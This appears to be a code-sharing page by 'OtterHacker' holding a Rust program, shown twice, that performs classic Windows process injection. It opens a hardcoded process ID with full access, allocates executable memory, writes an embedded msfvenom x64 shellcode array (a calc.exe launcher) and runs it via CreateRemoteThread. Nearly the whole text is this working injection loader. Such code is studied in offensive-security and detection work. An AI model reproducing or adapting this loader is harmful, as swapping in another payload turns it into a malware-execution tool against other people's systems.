OtterHacker · May 27, 2023 16:35
diff --git a/RustProcessInjection101.rs b/RustProcessInjection101.rs
 /*
 * Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
 */
 #[allow(non_camel_case_types)]
 type HANDLE = *mut u64;
 #[allow(non_camel_case_types)]
 type LPVOID = *mut u64;
 #[allow(non_camel_case_types)]
 type DWORD = u32;
 #[allow(non_camel_case_types)]
 type SIZE_T = u64;
 #[allow(non_camel_case_types)]
 type BOOL = DWORD;
 #[allow(non_camel_case_types)]
 type LPCVOID = *const u8;

 #[link(name = "KERNEL32")]

 extern {
    fn OpenProcess( dwDesiredAccess: DWORD, bInheritHandle: DWORD, dwProcessId: DWORD) -> HANDLE;
    fn VirtualAllocEx(hProcess: HANDLE, lpAddress: LPVOID, dwSize: SIZE_T, flAllocationType: DWORD, flProtect: DWORD) -> LPVOID;
    fn WriteProcessMemory(hProcess: HANDLE, lpBaseAddress: LPVOID, lpBuffer: LPCVOID, nSize: SIZE_T, lpNumberOfBytesWritten: *mut SIZE_T) -> BOOL;
    fn CreateRemoteThread(hProcess: HANDLE, lpThreadAttributes: LPVOID, dwStackSize: SIZE_T, lpStartAddress: LPVOID, lpParameter: LPVOID, dwCreationFlags: DWORD, lpThreadId: *mut DWORD) -> HANDLE;
 }

 fn main() {
    // MSFVENOM calc shellcode x64
    let shellcode: [u8;276] = 
    [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
    0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
    0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
    0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
    0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
    0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
    0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
    0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
    0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
    0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
    0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
    0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
    0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
    0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
    0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
    0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
    0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
    0x63,0x2e,0x65,0x78,0x65,0x00];

    let process_all_access: u32 = 0x1fffff;
    let pid: u32 = 23376;
    let process_handle: HANDLE = unsafe{OpenProcess(process_all_access, 0, pid)};
    assert!(!process_handle.is_null());
    println!("[+] Opening process {}", pid);

    let remote_buffer: HANDLE = unsafe{VirtualAllocEx(process_handle, std::ptr::null_mut(), shellcode.len() as u64, 0x00001000 | 0x00002000, 0x40)};
    assert!(!remote_buffer.is_null());
    println!("[+] Buffer allocated at : {:?}", process_handle);

    let mut bytes_written: SIZE_T = 0;
    let status: BOOL = unsafe{WriteProcessMemory(process_handle, remote_buffer, shellcode.as_ptr(), shellcode.len() as u64, &mut bytes_written)};
    assert!(status != 0);
    println!("[+] {} bytes written at {:?}", bytes_written, remote_buffer);
    
    let mut _thread_id: DWORD = 0;
    let thread_handle: HANDLE = unsafe{CreateRemoteThread(process_handle, std::ptr::null_mut(), 0, remote_buffer, std::ptr::null_mut(), 0, &mut _thread_id)}; 
    assert!(!thread_handle.is_null());
    println!("[+] Shellcode injected !");
 }
	/*
	* Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
	*/
	#[allow(non_camel_case_types)]
	type HANDLE = *mut u64;
	#[allow(non_camel_case_types)]
	type LPVOID = *mut u64;
	#[allow(non_camel_case_types)]
	type DWORD = u32;
	#[allow(non_camel_case_types)]
	type SIZE_T = u64;
	#[allow(non_camel_case_types)]
	type BOOL = DWORD;
	#[allow(non_camel_case_types)]
	type LPCVOID = *const u8;

	#[link(name = "KERNEL32")]

	extern {
	fn OpenProcess( dwDesiredAccess: DWORD, bInheritHandle: DWORD, dwProcessId: DWORD) -> HANDLE;
	fn VirtualAllocEx(hProcess: HANDLE, lpAddress: LPVOID, dwSize: SIZE_T, flAllocationType: DWORD, flProtect: DWORD) -> LPVOID;
	fn WriteProcessMemory(hProcess: HANDLE, lpBaseAddress: LPVOID, lpBuffer: LPCVOID, nSize: SIZE_T, lpNumberOfBytesWritten: *mut SIZE_T) -> BOOL;
	fn CreateRemoteThread(hProcess: HANDLE, lpThreadAttributes: LPVOID, dwStackSize: SIZE_T, lpStartAddress: LPVOID, lpParameter: LPVOID, dwCreationFlags: DWORD, lpThreadId: *mut DWORD) -> HANDLE;
	}

	fn main() {
	// MSFVENOM calc shellcode x64
	let shellcode: [u8;276] =
	[0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
	0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
	0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
	0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
	0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
	0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
	0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
	0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
	0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
	0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
	0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
	0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
	0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
	0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
	0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
	0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
	0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
	0x63,0x2e,0x65,0x78,0x65,0x00];

	let process_all_access: u32 = 0x1fffff;
	let pid: u32 = 23376;
	let process_handle: HANDLE = unsafe{OpenProcess(process_all_access, 0, pid)};
	assert!(!process_handle.is_null());
	println!("[+] Opening process {}", pid);

	let remote_buffer: HANDLE = unsafe{VirtualAllocEx(process_handle, std::ptr::null_mut(), shellcode.len() as u64, 0x00001000 \| 0x00002000, 0x40)};
	assert!(!remote_buffer.is_null());
	println!("[+] Buffer allocated at : {:?}", process_handle);

	let mut bytes_written: SIZE_T = 0;
	let status: BOOL = unsafe{WriteProcessMemory(process_handle, remote_buffer, shellcode.as_ptr(), shellcode.len() as u64, &mut bytes_written)};
	assert!(status != 0);
	println!("[+] {} bytes written at {:?}", bytes_written, remote_buffer);

	let mut _thread_id: DWORD = 0;
	let thread_handle: HANDLE = unsafe{CreateRemoteThread(process_handle, std::ptr::null_mut(), 0, remote_buffer, std::ptr::null_mut(), 0, &mut _thread_id)};
	assert!(!thread_handle.is_null());
	println!("[+] Shellcode injected !");
	}